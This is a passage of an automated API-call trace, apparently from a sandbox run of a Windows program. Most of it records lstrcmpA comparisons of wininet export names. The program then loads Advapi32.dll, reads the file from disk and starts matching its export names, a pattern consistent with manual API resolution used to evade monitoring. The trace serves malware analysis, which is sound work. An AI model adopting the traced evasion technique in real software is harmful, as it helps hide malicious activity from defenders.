lpString2="AppCacheDuplicateHandle") returned 0 [0253.248] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0253.248] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0253.248] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0253.248] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0253.248] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0253.432] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.432] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0253.433] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0253.433] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0253.434] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0253.435] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0253.435] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0253.436] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0253.436] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0253.437] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0253.437] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0253.437] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0253.437] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0253.437] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0253.437] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0253.437] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0253.437] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0253.437] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0253.437] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0253.437] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0253.437] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.438] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0253.439] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0253.439] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0253.439] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0253.439] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0253.439] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0253.439] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0253.439] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0253.439] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0253.439] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0253.439] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0253.439] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0253.439] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0253.440] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0253.440] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0253.440] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0253.440] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0253.440] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0253.440] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0253.440] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0253.459] GetProcessHeap () returned 0x4a0000 [0253.459] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x415f040 | out: hHeap=0x4a0000) returned 1 [0253.715] GetProcessHeap () returned 0x4a0000 [0253.715] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9160 [0253.718] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0253.718] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0253.718] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0253.719] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0253.720] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0253.720] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0253.720] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0253.720] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0253.720] GetProcessHeap () returned 0x4a0000 [0253.721] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa3ef0) returned 0x2d92010 [0253.723] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0253.723] ReadFile (in: hFile=0x140, lpBuffer=0x2d92010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d92010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0253.733] CloseHandle (hObject=0x140) returned 1 [0253.733] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0253.733] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0253.733] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0253.733] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0253.733] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0253.733] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0253.733] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0253.734] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0253.734] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0253.734] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0253.734] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 